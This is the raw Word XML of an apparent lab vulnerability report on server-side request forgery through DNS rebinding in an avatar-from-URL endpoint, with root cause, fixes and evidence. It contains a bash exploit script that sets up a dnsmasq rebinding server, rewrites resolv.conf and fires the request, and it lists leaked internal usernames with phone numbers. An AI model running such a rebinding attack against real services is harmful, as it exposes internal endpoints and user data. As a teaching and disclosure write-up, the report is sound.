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0139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1. Vulnerability Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB51A36" w14:textId="7F20F8A8" w:rsid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654FFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00654FFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE5270" w14:textId="77777777" w:rsidR="00654FFC" w:rsidRPr="003C2C28" w:rsidRDefault="00654FFC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10BB83E7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2. Location in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFF92E" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Endpoint: POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/profile/avatar-from-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53C71F65" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Service: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imageFetcher.fetchImage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0D18E" w14:textId="0D49198B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7A03ECB4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3. Why It Is Vulnerable (Technical Root Cause)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CB778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application allows users to provide an external image URL for avatar uploads.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Although a hostname allowlist is enforced, the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3736A9" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Trusts DNS hostname validation instead of IP validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738B07D" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Resolves DNS dynamically per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D75CA3" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Does not block loopback (127.0.0.1) or private IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509C005" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Does not pin the resolved IP after initial lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62183B62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This allows a DNS rebinding attack, where a domain initially resolves to an attacker-controlled IP and later resolves to 127.0.0.1, bypassing the allowlist and accessing internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB07F3" w14:textId="7EDD5D16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7A5CDDF3" w14:textId="301E45C2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4. Proof of Concept Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BBA9F6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Attacker registers and logs in to obtain a valid session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557437C7" w14:textId="607E0558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A malicious internal service (internal_service.py) is started on port 9999</w:t>
      </w:r>
      <w:r w:rsidR="00654FFC" w:rsidRPr="00654FFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid conflict with the port the application uses</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CBF55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3C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dnsmasq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is configured with a 1-second TTL to alternate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40950B40" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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3C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rebind.attacker.lab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→ 10.0.2.15 (attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD7B41" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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3C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rebind.attacker.lab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→ 127.0.0.1 (localhost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE40C2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attacker submits the avatar URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72972BA3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http://rebind.attacker.lab:9999/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C721243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During the fetch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F336C88" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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First DNS resolution connects to attacker service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D76F3A" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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lastRenderedPageBreak/>
        <w:t>After rebinding, the same hostname resolves to localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD2EB65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attacker service fetches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D6E0A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http://localhost:3000/internal/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75934248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internal admin response is embedded into an SVG image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D62BD64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SVG is saved as an avatar file (avatar_6.jpg).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40087B45" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Extracting the file reveals real internal user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206DED05" w14:textId="704E1736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342AA252" w14:textId="073F42B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5. Exploit Script (Bash</w:t>
      </w:r>
      <w:r w:rsidR="00654FFC" w:rsidRPr="00654F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A204E5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# Register attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2AE9D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curl -X POST http://localhost:3000/api/auth/register \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811ACAF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-H "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733780AC" w14:textId="75A0923B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-d '{"username":"hacker","phone":"1234567890","password":"hack123"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33502CC3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# Login and save session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D20C6F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curl -X POST http://localhost:3000/api/auth/login \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633BEC4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-H "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A20C6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-d '{"username":"hacker","password":"hack123"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA10FAF" w14:textId="5837F436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-c cookie.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE37CE6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# Start DNS rebinding server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B529A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3C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo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C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dnsmasq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--no-daemon \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCCFFD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--address=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rebind.attacker.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/10.0.2.15 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523E1EB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--address=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rebind.attacker.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/127.0.0.1 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45060C05" w14:textId="4B535D8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--local-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407F4FC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# Force system DNS to attacker DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204FBCC4" w14:textId="2C16E0BD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echo "nameserver 127.0.0.1" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tee /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>resolv.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E09760F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# Trigger vulnerable endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02E289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curl -X POST http://localhost:3000/api/profile/avatar-from-url \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B96760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-H "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFC443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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -b cookie.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD917E2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 xml:space="preserve">  -d '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imageUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":"http://rebind.attacker.lab:9999/"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275EEE7" w14:textId="1E2443EA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215AD76E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6. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350763B0" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Disclosure of internal admin data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778830C6" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Unauthorized access to internal-only endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC413F7" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Leakage of real user credentials and phone numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EC446" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Violation of trust boundary between public and internal services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC673B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Risk Level: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031105F3" w14:textId="6050FDC4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3F1DF8A5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C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7. Fix Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8A2B7" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Resolve DNS once and pin the IP address for the entire request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E72FFB" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Block loopback and private IP ranges explicitly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00288070" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Re-validate IP after redirects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3EA68" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Do not allow user-controlled URLs to access internal resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D46795" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FF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Implement network-level SSRF protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67969226" w14:textId="166FF685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p w14:paraId="16719F89" w14:textId="0A580592" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="00654FFC" w:rsidP="00654FF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FFC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3C2C28" w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20021B8B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The stored avatar file contained real internal data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A66A96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From: /internal/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1053EA1E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feruza: 0912345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E492A68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testuser1: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECC9BF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attacker: 666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320488DE" w14:textId="77777777" w:rsidR="003C2C28" w:rsidRPr="003C2C28" w:rsidRDefault="003C2C28" w:rsidP="00654FFC">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test: 0918769876</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7636FC" w14:textId="77777777" w:rsidR="00BC0CC4" w:rsidRPr="00654FFC" w:rsidRDefault="00BC0CC4" w:rsidP="00654FFC">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BC0CC4" w:rsidRPr="0065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BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0E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605"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E46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297D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D95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17559"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="641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652B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36D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673085">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="422144851">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="758020168">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1932541010">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1378236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8"/>
    <w:rsid w:val="00112447"/>
    <w:rsid w:val="003C2C28"/>
    <w:rsid w:val="004C5E58"/>
    <w:rsid w:val="00654FFC"/>
    <w:rsid w:val="00906BB1"/>
    <w:rsid w:val="00AD0EF4"/>
    <w:rsid w:val="00BC0CC4"/>
    <w:rsid w:val="00E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25EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01399D81-399B-42DE-9079-9087FC45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2C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2C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feruza hassen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>feruza hassen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-22T21:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-22T21:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>